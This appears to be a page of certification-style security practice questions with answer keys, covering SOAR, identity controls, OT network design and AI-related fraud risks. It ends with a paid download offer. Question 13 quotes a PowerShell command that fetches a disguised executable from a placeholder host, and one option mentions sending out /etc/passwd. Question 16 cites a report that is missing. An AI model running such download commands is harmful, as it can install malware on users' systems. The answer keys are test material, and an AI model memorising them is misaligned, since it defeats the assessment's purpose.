A security engineer must reduce overhead of routine security administration tasks with SOAR. Which of the following should the engineer do to best meet this objective?
A. Perform static analysis of potentially malicious software.
B. Enrich data based on threat intelligence feeds
C. Apply context-based access restrictions at scale
D. Change the enterprise password policy requirements
Show Answer
Correct Answer: B
Explanation: SOAR can automatically enrich security data with threat intelligence, eliminating a repetitive manual task. The other options are not typical SOAR administrative workflows.
Sources:
https://www.veritis.com/blog/what-is-soar-in-cybersecurity
Question 12
A security engineer receives the following findings from a recent security audit:
• Data should be protected based on user permissions and roles
• User action tracking should be implemented across the network
• Digital identities should be validated across the data access workflow
Which of the following is the first action the engineer should take to address the findings?
A. Implement continuous and context-based authentication and authorization
B. Use an enhanced user credential provisioning workflow and data monitoring tools
C. Improve federation services for digital identities and data access
D. Deploy OpenID Connect for application programming interface authentication
Show Answer
Correct Answer: A
Explanation: Continuous, context-based authentication and authorization applies identity and permission checks throughout access, allowing data access to reflect user roles and changing context. It is the broadest first step for addressing the findings; OpenID Connect is a more specific API authentication technology.
Question 13
A security analyst is investigating an EDR alert and notices the following commands from the shell:
PS > iwr -uri http://domain.com/happy.jpg -outfile .\important.url
The only artifact that the analyst has access to is a network packet capture. Which of the following actions would most likely confirm whether the file is malicious?
A. Reviewing the payload for a digital signature
B. Acquiring memory from an endpoint for analysis
C. Confirming that the contents of /etc/passwd were transmitted
D. Observing MZ in the binary stream header
Show Answer
Correct Answer: D
Explanation: The `MZ` signature in the captured file data indicates a Windows executable, despite the `.url` filename and `.jpg` URL. That would confirm the download is disguised as another file type and is suspicious. A valid digital signature alone would not prove a file is benign or malicious.
Question 14
A security analyst must design a system infrastructure that aligns to industry best practices and established frameworks. Which of the following should the analyst do first?
A. Establish a centralized logging tier.
B. Assign data labeling and data classification models.
C. Implement a vulnerability management program.
D. Perform a gap assessment of the security controls.
Show Answer
Correct Answer: D
Explanation: Perform a gap assessment first to compare the current security posture with the chosen framework and identify prioritized deficiencies. This informs which controls and programs—such as centralized logging, data classification, or vulnerability management—to implement.
Question 15
An architect is securing an external infrastructure to support external services. The following components are in use:
• One Kubernetes cluster with multiple pods and nodes for back-end services
• Two VM Linux instances as the web tier
• One SQL-based database
The company only has funding for two controls and must prioritize resilience. Which of the following are the most effective controls for the company to implement to meet this goal? (Choose two.)
A. An IAM policies enforced
B. A RASP to the workload services
C. A content delivery network
D. A database firewall on the SQL instance
E. An IPS at the web tier
F. An application load balancer
Show Answer
Correct Answer: C, F
Explanation: A content delivery network improves resilience by serving cached content from distributed edge locations and reducing load on the origin infrastructure. An application load balancer distributes requests across the web-tier instances and can route traffic away from unhealthy targets. Together, these controls best support availability and resilience.
Question 16
An organization that utilizes token-based access for all facilities and systems recently completed an annual review of its security controls. Given the following report:
Which of the following is the most important residual risk factor?
A. Non-repudiation
B. Token availability
C. Attestation
D. Systems monitoring
Show Answer
Correct Answer: B
Explanation: Because access to all facilities and systems depends on tokens, token loss, damage, or service disruption could prevent legitimate users from accessing critical resources. Token availability is therefore the key residual risk among the options.
Question 17
A security engineer needs to secure the OT environment based on the following requirements:
• Isolate the OT network segment.
• Restrict internet access.
• Apply security updates to workstations.
• Provide remote access to third-party vendors.
Which of the following design strategies should the engineer implement to best meet these requirements?
A. Deploy a jump box on the third-party network to access the ОТ environment and provide updates using a physical delivery method on the workstations.
B. Implement a bastion host in the ОТ network with security tools in place to monitor access and use a dedicated update server for the workstations.
C. Enable outbound internet access on the ОТ firewall to any destination IP address and use the centralized update server for the workstations.
D. Create a staging environment on the ОТ network for the third-party vendor to access and enable automatic updates on the workstations.
Show Answer
Correct Answer: B
Explanation: A monitored bastion host provides controlled remote access for third-party vendors, while a dedicated update server lets workstations receive security patches without allowing unrestricted internet access. This supports OT network isolation and restricted connectivity.
Question 18
A systems administrator uses an internal AI-based tool to generate code that uses an API to connect to a company service. After testing the code, the systems administrator collects and posts data using the API for the internal system. The Chief Information Security Officer asks a security engineer to review the systems administrator's process. Which of the following should the security engineer do first?
A. Check for hard-coded secrets in the application’s source code.
B. Use prompt-testing methodologies to ensure model security.
C. Review the effectiveness of the AI tool that the administrator used.
D. Analyze the large language model used to generate the output.
Show Answer
Correct Answer: A
Explanation: The immediate security concern is the generated code that accesses an internal API. The engineer should first inspect it for hard-coded API keys, tokens, or other secrets that could expose the service. Evaluating the AI tool or model does not address that direct risk.
Question 19
The accounts payable analyst receives a voicemail from the Chief Executive Officer (CEO), requesting that an invoice be paid. The voicemail provides wire transfer details that do not match the instructions on file. Which of the following is the most likely attack being employed?
A. Exploitation of a chatbot through prompt injection
B. Automated exploit generation capabilities through Al systems
C. Audio cloning of the CEO through online sampling
D. Real-time, deepfake voice phishing with interactivity
E. Social engineering to gain access to internal systems through malware
Show Answer
Correct Answer: C
Explanation: A voicemail impersonating the CEO to request payment to different wire details is consistent with a cloned voice used for payment fraud. Because it is a recorded message, there is no evidence of the real-time interactivity described in D.
Sources:
https://frpafraudviewer.org/aws/FRPA/pt/sp/news
Question 20
A security analyst is performing threat modeling for a new AI chatbot. The AI chatbot will be rolled out to help customers develop configuration information within the company's SaaS offering. Which of the following issues would require involvement from the company's internal legal team?
A. An internal user finds a way to use prompt injection to disregard guardrails.
B. A DoS vulnerability exists that could impact all customers who use the chatbot.
C. A bug bounty of an exploitable model inversion vulnerability is submitted.
D. User consent is not being collected before training models on customer data.
E. An access control issue is allowing the model to be poisoned with incorrect information.
Show Answer
Correct Answer: D
Explanation: Training models on customer data without collecting user consent raises privacy, contractual, and regulatory questions that require the internal legal team’s involvement. The other options primarily describe technical security vulnerabilities.
$19
Get all 400 questions with detailed answers and explanations
Instant download HTML + PDF delivered the moment payment clears.
Secure Stripe checkout we never see or store your card details.
7-day refund if files are defective see our refund policy.